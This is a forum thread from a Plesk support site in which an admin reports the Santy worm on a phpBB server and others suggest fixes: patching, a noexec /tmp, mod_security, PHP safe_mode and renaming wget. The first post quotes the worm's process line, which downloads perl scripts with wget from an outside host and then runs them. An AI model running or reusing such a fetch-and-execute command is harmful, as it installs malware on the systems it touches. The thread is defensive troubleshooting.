• If you are still using CentOS 7.9, it's time to convert to Alma 8 with the free centos2alma tool by Plesk or Plesk Migrator. Please let us know your experiences or concerns in this thread:
    CentOS2Alma discussion

Worm problem with apache 2.0.8

trec

New Pleskian
I am having some strage process:

apache 610 0.3 0.0 5320 1096 ? S 02:13 0:00 sh -c cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt
apache 611 0.3 0.0 6716 1608 ? S 02:13 0:00 wget www.visualcoders.net/spybot.txt
apache 619 0.0 0.1 8232 3680 ? S 02:13 0:00 /usr/local/sbin/httpd - spy

and there are several of the last one: httpd - spy

it seems to be a worm, in /tmp there are several .txt files

any clue on how to remove it?
 
seems to be santy, are you running phpbb?

You have to kill all httpd processes and restart apache. Remove all files in /tmp

Upgrade phpbb to the latest version. Upgrade php (plesk 7.5.1) to be sure to have many security bugs fixed.
 
thanks ptheborg and Ivalics, thanks for the info, that's precisely the worm I have. The problem is I have several sites using phpBB (about 7) and others using PHPNuke, so disable phpBB or php applications is not the option for me right now.

How can I secure the /tmp folder to not be executable?
would this affect any other softare or function?

I will be upgrading to Plesk 7.5.1 later today and also would like to make the correct changes on /tmp
 
Has anyone figure out how to completely stop these intrusions?

I've upgaded php to 4.3.10, upgraded all phpBB's on my server to 2.0.11, and followed most of the steps (i.e. securing /tmp and renaming wget) that lvalics detailed on his site. (Thank lvalics)

Still, every few hours my /tmp is full of random files that contain perl scripts or lists of phpBB sites that someone is scanning for using my server.

I've searched thru google.com and I can't figure out what I am missing. How are they still getting in?
 
Checked into mod_security yet?
Short of a complete reimage of the server, about all you can do is assure that commands that can eploit the php bug can not be executed at all.
 
Sounds bad.
Can be for example the attacker already in the system. Then it will be hard to kick out or almost impossibble and maybe (is maybe) require a full reinstall.
There is several way to find out if they are inside, but is too long to write down here. I will try to point some ideeas, but depend on your Linux skill if you can or not fight against it.

1. If is a BNCalready installed or some other program and he is already a root user, I suggest to act like you don't know about him for 1-2 days, and do a backup and save it somewhere on the other server (psadump). This is in case if he observe you and try to delete things and server crash, you need a full backup.

2. Try to see what scripts install and each script how to act, where to install itself. Is not easy, because if this user is smart, then is hard to find out, he delete all logs, all clues.
We have a program what we use it to hide ourself in this cases and we stay alerted when he login, to watch waht he do.
This small perl script mig_logcleaner (what probbbly use him as well or something simlar) will hide you and he cannot see that you are logged in and he will work like noone is on server.
You can watch what he do (reading root or user bah history before he delete it).

3. Try to install a chrootkit (only after you have done point 1, full backup) and try to find out the worm.

4. Try to run different commands like ps or netstat and try to see if you can find any anomalies in processess, for example you can see with netstat something like port - or port 6 used or things what is not normal.
Is not easy to find them.

5. Last thing is to reinstall OS clean install and restore PLESK.

If you as not hacked already then you need to find out where, in which apache log he try to write.
You can try to use tcpdump to see where these attackes come from, you can try to see also apache logs, but is almost impossibble if you have over 10 domains, to see it all.

Maybe a nice ideea to PLESK to not log only to directory for each user, to log also for admin in one log for each domains, I don't know if it's possibble, but I as Admin I like to have always a possibilitie to see log for all domins in one file to look where can be a problem, insted search in all ...

Hope this help.
 
may not fix all the holes but take a look at

http://eth0.us

he has posted a mod_security how-to that blocks some issues about phpbb, allowing you to keep phpbb on your servers, it may not be the completest ruleset, but it works! i have tested it on my test box and production box and works.

regards,
 
Hi,

afaik the worm does not work if php safe_mode is activated ...

Did you activate PHP safe_mode globaly?

Regards,

Bobby
 
wget

I didn't read this entire forum, but this issue was spoken about in another threat:
http://forum.plesk.com/showthread.php?s=&postid=91894

The easiest and quickest way to prevent sites for downloading the trojans is to simply rename your wget command to something else. So they won't be able to use this command at all and cannot download the trojans.

This worked for me, but ofcourse it is not a definitive solution. It just saves you a lot of trouble right away.
 
Back
Top